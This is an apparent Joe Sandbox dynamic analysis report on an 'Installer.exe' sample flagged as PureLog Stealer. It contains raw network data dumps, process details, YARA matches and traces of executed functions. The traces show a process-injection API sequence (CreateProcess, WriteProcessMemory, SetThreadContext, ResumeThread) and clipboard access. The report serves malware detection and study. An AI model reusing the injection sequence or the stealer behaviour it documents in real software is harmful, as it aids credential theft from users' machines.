365815JMIwwJ05GVTBkdO4DJwrLeE5U5KooVCA4I7bWFgUKM6W5FeCvpoLlufD8BseXg1vwptwxh33I4PEfV2t/qKKfbG0tJRaun1AhDNmrOqqfKlmfbVUfEcHFCX5nkxuAyi719SVhQoej9IUp4UOioh+OoW/p4ZOQgST9w2vDgsXGAy30URX2yoNQGbE5XyYeM2KhY0mNjvEZOYVqujeDmA+X0J2dUQaDDohhDR1
2025-01-05 18:41:09 UTC	1369	IN	Data Raw: 48 59 75 71 6a 38 72 45 62 55 56 42 7a 34 5a 47 6b 39 58 36 44 38 39 4d 63 54 6c 4e 6f 46 64 33 67 36 69 61 48 67 4c 56 38 6c 64 64 6d 43 70 73 47 76 61 2b 4a 6c 42 62 4e 69 50 53 56 35 31 4f 48 42 7a 53 6d 36 77 79 52 32 52 7a 75 43 71 61 49 5a 49 47 70 72 7a 76 2f 32 39 49 73 72 37 46 4a 4e 33 57 31 4e 5a 58 75 48 38 65 4c 6b 63 75 54 56 42 6b 38 37 51 50 6a 77 37 51 6c 54 61 58 2f 4f 6d 6f 37 67 74 47 58 65 66 6e 44 44 49 31 74 49 5a 34 76 32 76 65 51 42 6b 71 73 71 45 7a 74 52 6d 2b 58 48 65 30 31 48 59 66 43 52 73 64 76 76 59 63 42 34 52 37 39 5a 58 57 6b 34 33 2f 72 32 37 68 69 38 2b 44 78 71 57 32 47 57 33 65 31 36 58 46 6c 68 39 5a 69 4d 30 62 74 72 2b 30 31 6b 34 56 4a 47 61 33 47 68 34 76 48 51 41 62 58 37 50 48 42 49 58 59 71 6d 37 43 52 30 54 Data Ascii: HYuqj8rEbUVBz4ZGk9X6D89McTlNoFd3g6iaHgLV8lddmCpsGva+JlBbNiPSV51OHBzSm6wyR2RzuCqaIZIGprzv/29Isr7FJN3W1NZXuH8eLkcuTVBk87QPjw7QlTaX/Omo7gtGXefnDDI1tIZ4v2veQBkqsqEztRm+XHe01HYfCRsdvvYcB4R79ZXWk43/r27hi8+DxqW2GW3e16XFlh9ZiM0btr+01k4VJGa3Gh4vHQAbX7PHBIXYqm7CR0T
2025-01-05 18:41:09 UTC	1369	IN	Data Raw: 61 77 62 63 69 35 32 78 72 35 79 42 44 57 32 2f 64 68 38 71 35 4c 59 33 35 4a 6c 4e 46 58 72 76 55 32 54 51 76 58 48 2f 61 34 70 50 38 76 58 62 74 63 56 37 45 65 57 56 41 62 5a 54 35 30 76 55 54 6c 50 41 6e 55 31 39 4e 68 38 69 69 4e 58 46 77 61 4d 2b 69 71 74 4f 62 51 75 4e 78 52 63 74 62 5a 6a 74 4a 33 4d 32 79 78 43 66 6e 6f 42 74 36 50 54 36 61 35 66 52 39 57 46 64 4f 30 36 57 4c 2f 4a 42 35 34 33 4a 74 30 46 77 2b 58 55 36 43 35 38 61 35 4a 37 44 54 66 6b 56 6e 54 59 76 5a 35 68 34 75 53 57 48 61 6f 35 72 42 74 79 4c 6e 62 47 76 6e 49 45 4e 62 62 39 32 48 79 72 6b 74 6a 66 6b 6d 55 30 56 65 75 39 54 5a 4e 43 39 63 66 39 72 69 6b 2f 79 39 64 75 31 78 58 73 52 35 5a 55 42 74 6c 50 6e 53 39 52 4f 55 38 43 64 54 58 30 32 48 79 4b 49 31 63 58 42 6f 7a 36 Data Ascii: awbci52xr5yBDW2/dh8q5LY35JlNFXrvU2TQvXH/a4pP8vXbtcV7EeWVAbZT50vUTlPAnU19Nh8iiNXFwaM+iqtObQuNxRctbZjtJ3M2yxCfnoBt6PT6a5fR9WFdO06WL/JB543Jt0Fw+XU6C58a5J7DTfkVnTYvZ5h4uSWHao5rBtyLnbGvnIENbb92HyrktjfkmU0Veu9TZNC9cf9rik/y9du1xXsR5ZUBtlPnS9ROU8CdTX02HyKI1cXBoz6
2025-01-05 18:41:09 UTC	1369	IN	Data Raw: 51 61 4a 74 65 4e 31 77 54 57 77 35 33 2f 2f 4d 39 78 4b 6a 6f 7a 35 46 51 45 2b 35 32 50 30 57 4b 33 49 44 79 34 36 79 36 4b 35 5a 70 45 30 5a 34 31 52 79 56 47 71 69 34 65 54 72 44 62 58 2f 49 48 46 66 5a 70 6e 43 34 33 56 31 62 51 37 4b 38 4b 50 42 6d 69 72 50 58 6c 50 39 65 48 70 49 50 35 76 6b 32 61 34 73 6c 65 4d 71 52 6c 68 66 6e 50 66 77 4b 46 51 32 64 65 36 43 68 34 47 72 65 2b 56 79 57 37 78 44 4f 58 39 5a 71 64 4c 58 79 6a 65 41 2f 53 30 57 4f 6c 47 6d 71 65 30 44 4c 6a 5a 6e 72 37 75 68 2f 36 68 52 32 45 38 66 2b 55 4a 68 62 57 65 34 77 62 58 4d 4d 62 6d 6a 46 68 4a 37 50 2b 44 65 30 78 39 42 4c 31 6e 6a 67 66 48 47 75 79 53 6c 61 56 4c 47 51 56 4a 42 57 61 44 52 73 65 34 71 35 76 67 68 65 33 5a 6f 71 74 33 43 4f 45 68 65 57 73 4f 44 72 73 69 Data Ascii: QaJteN1wTWw53//M9xKjoz5FQE+52P0WK3IDy46y6K5ZpE0Z41RyVGqi4eTrDbX/IHFfZpnC43V1bQ7K8KPBmirPXlP9eHpIP5vk2a4sleMqRlhfnPfwKFQ2de6Ch4Gre+VyW7xDOX9ZqdLXyjeA/S0WOlGmqe0DLjZnr7uh/6hR2E8f+UJhbWe4wbXMMbmjFhJ7P+De0x9BL1njgfHGuySlaVLGQVJBWaDRse4q5vghe3Zoqt3COEheWsODrsi
2025-01-05 18:41:09 UTC	1369	IN	Data Raw: 45 65 38 51 6d 39 50 5a 61 72 6c 73 37 41 4b 76 4b 6f 69 51 6c 5a 46 6f 76 6e 59 4b 57 67 72 62 73 47 6b 39 4d 71 58 65 75 46 63 63 4c 4a 6e 59 44 31 6c 6e 65 7a 53 36 53 6e 6b 70 33 68 4a 57 6a 36 52 36 4d 63 50 66 56 34 4b 38 37 75 45 36 4f 74 57 37 57 55 46 30 45 4e 2f 4a 57 36 41 2f 73 4c 62 4d 65 48 35 4a 30 70 61 53 49 50 53 31 79 42 79 56 6b 6a 36 70 37 66 6e 6d 33 62 6a 62 6b 61 35 55 6d 78 50 59 4b 4c 58 78 2f 49 62 6b 2f 4d 34 52 45 5a 2f 67 4f 44 50 48 6d 31 75 65 4c 57 4e 6e 70 32 75 66 39 6c 4f 62 4e 42 44 5a 6d 70 52 76 39 7a 68 36 67 61 50 2b 58 68 41 52 48 47 64 32 39 30 61 64 31 64 42 31 62 75 65 6e 59 52 4c 7a 30 35 4e 75 69 64 46 53 6c 2b 36 31 2b 62 57 4f 4b 50 4b 65 78 4e 44 54 2b 58 6f 35 68 56 54 62 33 32 30 70 71 71 44 74 48 37 4e Data Ascii: Ee8Qm9PZarls7AKvKoiQlZFovnYKWgrbsGk9MqXeuFccLJnYD1lnezS6Snkp3hJWj6R6McPfV4K87uE6OtW7WUF0EN/JW6A/sLbMeH5J0paSIPS1yByVkj6p7fnm3bjbka5UmxPYKLXx/Ibk/M4REZ/gODPHm1ueLWNnp2uf9lObNBDZmpRv9zh6gaP+XhARHGd290ad1dB1buenYRLz05NuidFSl+61+bWOKPKexNDT+Xo5hVTb320pqqDtH7N
2025-01-05 18:41:09 UTC	1369	IN	Data Raw: 52 6c 4a 54 71 2f 78 75 69 31 46 36 33 6a 48 6d 42 47 62 70 7a 77 35 67 52 4c 4e 67 37 45 6f 61 43 42 6c 33 54 33 41 55 58 6d 63 57 52 30 62 72 66 76 2f 38 34 50 73 75 4e 36 64 6b 31 6b 74 50 6a 50 4c 7a 4a 61 66 4c 69 46 6b 75 4f 32 49 38 31 34 51 37 31 77 62 30 46 44 76 4e 43 75 79 7a 43 52 70 69 4e 4c 50 57 4f 2b 79 65 38 74 59 46 46 73 39 4a 69 42 30 35 31 5a 2b 55 4e 38 78 43 4a 2f 66 54 71 2b 2f 64 66 69 41 61 44 78 4a 30 70 38 55 59 6d 6b 39 77 63 70 64 51 7a 46 34 6f 76 66 76 31 33 79 43 30 2f 53 51 55 4d 36 4f 72 2f 47 36 4c 51 4d 69 37 30 68 52 55 63 39 70 64 32 68 44 55 55 79 56 4d 4b 4b 2b 74 65 35 4b 75 78 4c 45 75 52 52 52 33 31 37 78 73 48 58 71 69 43 6a 70 58 6c 76 57 58 76 34 2f 64 38 61 62 47 31 38 74 4c 75 54 36 75 78 78 39 6e 55 54 35 Data Ascii: RlJTq/xui1F63jHmBGbpzw5gRLNg7EoaCBl3T3AUXmcWR0brfv/84PsuN6dk1ktPjPLzJafLiFkuO2I814Q71wb0FDvNCuyzCRpiNLPWO+ye8tYFFs9JiB051Z+UN8xCJ/fTq+/dfiAaDxJ0p8UYmk9wcpdQzF4ovfv13yC0/SQUM6Or/G6LQMi70hRUc9pd2hDUUyVMKK+te5KuxLEuRRR317xsHXqiCjpXlvWXv4/d8abG18tLuT6uxx9nUT5
2025-01-05 18:41:09 UTC	1369	IN	Data Raw: 4a 74 4e 47 31 7a 6a 62 76 35 41 6f 61 52 6b 2b 66 34 4d 63 5a 58 79 39 49 35 66 71 4f 2f 71 31 52 2b 6d 74 70 73 6e 42 76 54 46 6d 78 6d 75 66 76 4b 62 62 6d 65 52 4d 6e 66 62 76 35 70 68 30 76 4c 6b 4b 34 6b 62 54 5a 69 32 58 66 43 78 6a 42 4c 57 64 6f 4d 4a 37 41 38 73 59 71 6b 74 34 30 46 55 31 46 6f 4f 62 58 43 6d 6c 63 51 2f 4f 50 73 64 36 7a 58 66 42 77 48 66 4e 38 55 48 64 53 67 2b 2f 73 79 68 69 52 7a 6d 4e 43 65 55 57 37 39 75 56 36 64 43 67 4a 30 50 32 68 2b 49 78 5a 30 58 64 66 77 56 4a 68 4a 55 53 75 2b 4d 44 45 4e 70 76 42 4f 58 49 38 53 37 37 31 39 43 34 76 66 41 2f 57 2f 71 6a 75 38 56 2f 5a 53 6d 6a 6c 52 30 73 32 62 59 72 32 74 4f 59 52 72 76 67 4b 64 6d 6b 78 34 2b 66 52 4b 33 5a 35 64 38 69 72 75 39 50 73 53 61 51 42 52 4c 6c 61 57 31 Data Ascii: JtNG1zjbv5AoaRk+f4McZXy9I5fqO/q1R+mtpsnBvTFmxmufvKbbmeRMnfbv5ph0vLkK4kbTZi2XfCxjBLWdoMJ7A8sYqkt40FU1FoObXCmlcQ/OPsd6zXfBwHfN8UHdSg+/syhiRzmNCeUW79uV6dCgJ0P2h+IxZ0XdfwVJhJUSu+MDENpvBOXI8S7719C4vfA/W/qju8V/ZSmjlR0s2bYr2tOYRrvgKdmkx4+fRK3Z5d8iru9PsSaQBRLlaW1
2025-01-05 18:41:09 UTC	1369	IN	Data Raw: 77 2f 41 4f 6a 76 34 38 51 44 74 38 71 64 33 4a 59 30 42 6f 62 4e 6e 34 39 2f 53 74 63 74 73 4d 45 2f 39 6d 59 6d 4d 78 6f 39 2f 7a 77 68 43 47 33 67 39 69 52 32 61 52 30 71 31 31 59 47 6f 50 7a 66 47 33 35 70 46 6e 2f 77 74 4a 30 43 46 37 50 56 79 71 7a 65 72 79 44 70 32 6e 42 33 5a 72 49 71 4c 45 79 57 4e 42 4b 56 44 7a 67 36 2f 31 74 6c 62 5a 51 57 61 34 49 6c 39 47 58 61 62 67 37 64 55 67 6e 39 63 55 52 6b 38 77 6e 4e 58 74 66 57 31 42 46 4c 65 66 6f 50 65 2f 49 74 64 64 57 4d 4a 68 63 58 63 2f 72 4e 54 41 30 44 53 66 2f 51 31 73 57 7a 32 57 6f 2b 41 51 4e 6c 46 61 35 36 53 59 32 61 6f 6a 33 32 74 77 32 56 78 64 65 58 32 4f 6a 62 7a 37 4c 4c 37 5a 44 33 6c 46 63 4f 4c 45 77 33 56 65 61 6c 2f 5a 6d 71 72 55 74 56 66 4e 56 56 33 34 49 58 6b 38 65 70 7a Data Ascii: w/AOjv48QDt8qd3JY0BobNn49/StctsME/9mYmMxo9/zwhCG3g9iR2aR0q11YGoPzfG35pFn/wtJ0CF7PVyqzeryDp2nB3ZrIqLEyWNBKVDzg6/1tlbZQWa4Il9GXabg7dUgn9cURk8wnNXtfW1BFLefoPe/ItddWMJhcXc/rNTA0DSf/Q1sWz2Wo+AQNlFa56SY2aoj32tw2VxdeX2Ojbz7LL7ZD3lFcOLEw3Veal/ZmqrUtVfNVV34IXk8epz
2025-01-05 18:41:09 UTC	1369	IN	Data Raw: 4c 62 55 47 56 56 45 5a 70 4c 47 2b 33 67 70 4c 41 69 7a 6a 4a 48 5a 37 58 33 4d 51 48 61 6c 58 44 68 76 4f 4e 6e 2f 38 65 51 75 6b 66 59 43 64 6e 70 45 6f 73 76 51 42 30 30 6b 56 4e 6a 37 2b 75 61 35 55 74 64 66 51 4e 4a 4e 62 6d 31 5a 6f 75 48 6a 35 53 69 31 34 53 5a 33 66 6c 32 43 2f 50 73 48 54 30 51 4c 2b 4a 37 36 32 61 35 2f 77 6b 6c 6d 36 33 31 74 51 6e 2b 33 39 4d 50 35 61 5a 32 72 4b 46 56 30 54 4a 33 66 6f 69 46 55 62 6b 4c 4a 2b 37 62 2b 6a 58 4c 32 53 58 2f 77 51 55 31 43 63 59 58 69 38 4d 51 53 6d 61 70 31 45 30 39 56 2f 4e 6e 5a 43 45 4e 2f 55 73 32 52 74 76 33 71 52 71 64 49 5a 2f 77 73 51 58 73 34 6d 4f 54 73 36 68 61 30 71 7a 70 73 50 47 65 6e 32 4f 30 62 57 6c 42 30 77 70 43 6c 31 71 6c 53 6f 52 4a 38 36 55 4e 78 64 7a 71 68 68 63 44 41 Data Ascii: LbUGVVEZpLG+3gpLAizjJHZ7X3MQHalXDhvONn/8eQukfYCdnpEosvQB00kVNj7+ua5UtdfQNJNbm1ZouHj5Si14SZ3fl2C/PsHT0QL+J762a5/wklm631tQn+39MP5aZ2rKFV0TJ3foiFUbkLJ+7b+jXL2SX/wQU1CcYXi8MQSmap1E09V/NnZCEN/Us2Rtv3qRqdIZ/wsQXs4mOTs6ha0qzpsPGen2O0bWlB0wpCl1qlSoRJ86UNxdzqhhcDA

Target ID:	0
Start time:	13:40:57
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Installer.exe"
Imagebase:	0x7a0000
File size:	370'176 bytes
MD5 hash:	D6C51AF8146503EEBC3A023123936D29
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1653958308.00000000007A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:40:57
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:40:57
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Installer.exe"
Imagebase:	0x710000
File size:	370'176 bytes
MD5 hash:	D6C51AF8146503EEBC3A023123936D29
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:40:57
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 164
Imagebase:	0x960000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	57.1%
Total number of Nodes:	14
Total number of Limit Nodes:	2

Executed Functions

Function 02D68639 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D685AB,02D6859B), ref: 02D687D1
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02D687E4
Wow64GetThreadContext.KERNEL32(000000A8,00000000), ref: 02D68802
ReadProcessMemory.KERNELBASE(00000394,?,02D685EF,00000004,00000000), ref: 02D68826
VirtualAllocEx.KERNELBASE(00000394,?,?,00003000,00000040), ref: 02D68851
WriteProcessMemory.KERNELBASE(00000394,00000000,?,?,00000000,?), ref: 02D688A9
WriteProcessMemory.KERNELBASE(00000394,00400000,?,?,00000000,?,00000028), ref: 02D688F4
WriteProcessMemory.KERNELBASE(00000394,?,?,00000004,00000000), ref: 02D68932
Wow64SetThreadContext.KERNEL32(000000A8,02CC0000), ref: 02D6896E
ResumeThread.KERNELBASE(000000A8), ref: 02D6897D

Strings

WriteProcessMemory, xrefs: 02D6874C
CreateProcessW, xrefs: 02D686ED
GetThreadContext, xrefs: 02D68713
Load, xrefs: 02D68677
SetThreadContext, xrefs: 02D6875F
VirtualAllocEx, xrefs: 02D68739
TerminateProcess, xrefs: 02D68860
ReadProcessMemory, xrefs: 02D68726
ress, xrefs: 02D686C3
ResumeThread, xrefs: 02D68775
VirtualAlloc, xrefs: 02D68700
aryA, xrefs: 02D6867F
GetP, xrefs: 02D686BB

Memory Dump Source

Source File: 00000000.00000002.2071565028.0000000002D68000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D68000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d68000_Installer.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: 67799f815d621a2ca0c1527d3ed67a07f3efb9229e1e2ae973944a4175b3b04d
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: 41B1F97660064AAFDB60CF68CC80BEA73A5FF88714F158124EA08EB341D774FA55CB94

Function 02D687B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D685AB,02D6859B), ref: 02D687D1
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02D687E4
Wow64GetThreadContext.KERNEL32(000000A8,00000000), ref: 02D68802
ReadProcessMemory.KERNELBASE(00000394,?,02D685EF,00000004,00000000), ref: 02D68826
VirtualAllocEx.KERNELBASE(00000394,?,?,00003000,00000040), ref: 02D68851
WriteProcessMemory.KERNELBASE(00000394,00000000,?,?,00000000,?), ref: 02D688A9
WriteProcessMemory.KERNELBASE(00000394,00400000,?,?,00000000,?,00000028), ref: 02D688F4
WriteProcessMemory.KERNELBASE(00000394,?,?,00000004,00000000), ref: 02D68932
Wow64SetThreadContext.KERNEL32(000000A8,02CC0000), ref: 02D6896E
ResumeThread.KERNELBASE(000000A8), ref: 02D6897D

Strings

TerminateProcess, xrefs: 02D68860

Memory Dump Source

Source File: 00000000.00000002.2071565028.0000000002D68000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D68000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d68000_Installer.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: TerminateProcess
API String ID: 2687962208-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: de43b0b44e4d079bf8c981af69c864406f2d85e14f36948df0744b89a231271a
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 70312A72640246ABD734CF94CC81FEA7365BF88B14F148508EA09AF780C6B0FA05CB94

Function 010B06E8 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03D63588,00000000,?,?,?,?,?,?,?,007AA227,00000000,?,010B1116,?,00000040), ref: 010B2EC1

Memory Dump Source

Source File: 00000000.00000002.2071164565.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10b0000_Installer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0d891b5ce314e228174eb7d64f3e7b735795ef7ed2bb6931cb0b1b1af16cca75
Instruction ID: 988cac1a445e2bdb9602166706c525c20b04d3656263700177369c2dcb4a7bd7
Opcode Fuzzy Hash: 0d891b5ce314e228174eb7d64f3e7b735795ef7ed2bb6931cb0b1b1af16cca75
Instruction Fuzzy Hash: C121C2B5D01259AFCB00DF9AD884ADEFBB4FB48310F10852AE958A7310D774A954CFE5

Function 010B2E43 Relevance: 1.6, APIs: 1, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03D63588,00000000,?,?,?,?,?,?,?,007AA227,00000000,?,010B1116,?,00000040), ref: 010B2EC1

Memory Dump Source

Source File: 00000000.00000002.2071164565.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10b0000_Installer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 538fde59dc9891ab47c0653da48646823202b8a71212ca125fe1380fd218316e
Instruction ID: c8e08cbe5e5d14284448a2d4c089d4429d36e3b98ab48b047f15cc2ee9dd381d
Opcode Fuzzy Hash: 538fde59dc9891ab47c0653da48646823202b8a71212ca125fe1380fd218316e
Instruction Fuzzy Hash: 3221F2B5D01259AFCB00DF9AC884ADEFFB4FF08320F10812AE958A7210C374A944CFA5

Non-executed Functions

Function 010B0861 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

4'^q, xrefs: 010B0939
4'^q, xrefs: 010B090E

Memory Dump Source

Source File: 00000000.00000002.2071164565.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10b0000_Installer.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: be1f30e0c6291c7b80ee959b121f441dd0824171007ac2086d6ffb1e19f366ad
Instruction ID: 5053466bbf43af1a16f4f85f99ecca4938d4f6cb7c62cbf469448c20f0788f84
Opcode Fuzzy Hash: be1f30e0c6291c7b80ee959b121f441dd0824171007ac2086d6ffb1e19f366ad
Instruction Fuzzy Hash: D4511B75E012488FD709EF7AF95179ABBE3ABC4300B08C53AD0159B379EF34650A9B51

Function 010B0870 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

4'^q, xrefs: 010B0939
4'^q, xrefs: 010B090E

Memory Dump Source

Source File: 00000000.00000002.2071164565.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10b0000_Installer.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: d211ffa9a456e2a5997b49b4f3a290f079c438cddffeb348438977c8c8d25e11
Instruction ID: c74b989a9513f69887ee7800c4f6996b43f09dbecad761ad617ee417d6d68b9a
Opcode Fuzzy Hash: d211ffa9a456e2a5997b49b4f3a290f079c438cddffeb348438977c8c8d25e11
Instruction Fuzzy Hash: 8C511B75A012488FD709EF7AF95179ABBE3BBC8300B08C53AD0159B379EF3465099B51

Analysis Process: Installer.exePID: 7480, Parent PID: 7412COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	4.4%
Signature Coverage:	42.6%
Total number of Nodes:	366
Total number of Limit Nodes:	26

Executed Functions

Function 0043DCC0 Relevance: 32.4, APIs: 11, Strings: 7, Instructions: 917
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(F7F6F5C9,00000000,00000001,?,00000000), ref: 0043E1AC
SysAllocString.OLEAUT32(B3FDB1E2), ref: 0043E21C
CoSetProxyBlanket.COMBASE(F7F6F5C9,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043E25A
SysAllocString.OLEAUT32(41114719), ref: 0043E2D3
SysAllocString.OLEAUT32(D218DC08), ref: 0043E36B
VariantInit.OLEAUT32(?), ref: 0043E3E4
SysFreeString.OLEAUT32(00000000), ref: 0043E702
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043E737

Strings

_F, xrefs: 0043E483, 0043E487
[R, xrefs: 0043E416
j|AP, xrefs: 0043E2C6
}|AP, xrefs: 0043E298
8e, xrefs: 0043E406
mbc`, xrefs: 0043DD4B
8e, xrefs: 0043E0D2, 0043E162

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: 8e$8e$[R$_F$j|AP$mbc`$}|AP
API String ID: 505850577-2278612819
Opcode ID: 343581a6233ef45cec74f1418d82f179359f82717aa78b65fc48aa8c258b27f1
Instruction ID: d9e9cfcbe5730953a4702a136d8f052b4a70f9d97d2cf84d869405414de4b765
Opcode Fuzzy Hash: 343581a6233ef45cec74f1418d82f179359f82717aa78b65fc48aa8c258b27f1
Instruction Fuzzy Hash: 2D62EF716093409BE324CF29C89176FBBE1EBD9714F18892EE4D99B381D778D805CB86

Function 03301000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 03301032
OpenClipboard.USER32(00000000), ref: 0330103C
GetClipboardData.USER32(0000000D), ref: 0330104C
GlobalLock.KERNEL32(00000000), ref: 0330105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 03301090
GlobalLock.KERNEL32 ref: 033010A0
GlobalUnlock.KERNEL32 ref: 033010C1
EmptyClipboard.USER32 ref: 033010CB
SetClipboardData.USER32(0000000D), ref: 033010D6
GlobalFree.KERNEL32 ref: 033010E3
GlobalUnlock.KERNEL32(?), ref: 033010ED
CloseClipboard.USER32 ref: 033010F3
GetClipboardSequenceNumber.USER32 ref: 033010F9

Memory Dump Source

Source File: 00000002.00000002.2898255135.0000000003301000.00000020.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true

Associated: 00000002.00000002.2898242313.0000000003300000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2898267458.0000000003302000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3300000_Installer.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 19781485244c49c56caf3a5a3f72a6b79463f2d57a761a8103eb8833bc52291a
Instruction ID: 18ed01ce1d3fb30b77f132e573d3faa9efb777a8e7e76aa16e5f8522de07ced4
Opcode Fuzzy Hash: 19781485244c49c56caf3a5a3f72a6b79463f2d57a761a8103eb8833bc52291a
Instruction Fuzzy Hash: 3A21F835E042109BD7247B72EDADB2BB7ECFF04749F0808AAF985D6194E765D800C7A1

Function 00426970 Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 550
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00426A95
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00426B29

Strings

[[, xrefs: 00426FDE
es, xrefs: 00426D25
f, xrefs: 00426D35
Vh, xrefs: 004270C1, 004270C5
_fUd, xrefs: 00426F70
pe, xrefs: 00426D2D
FR, xrefs: 00426FD6

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: FR$Vh$[[$_fUd$es$f$pe
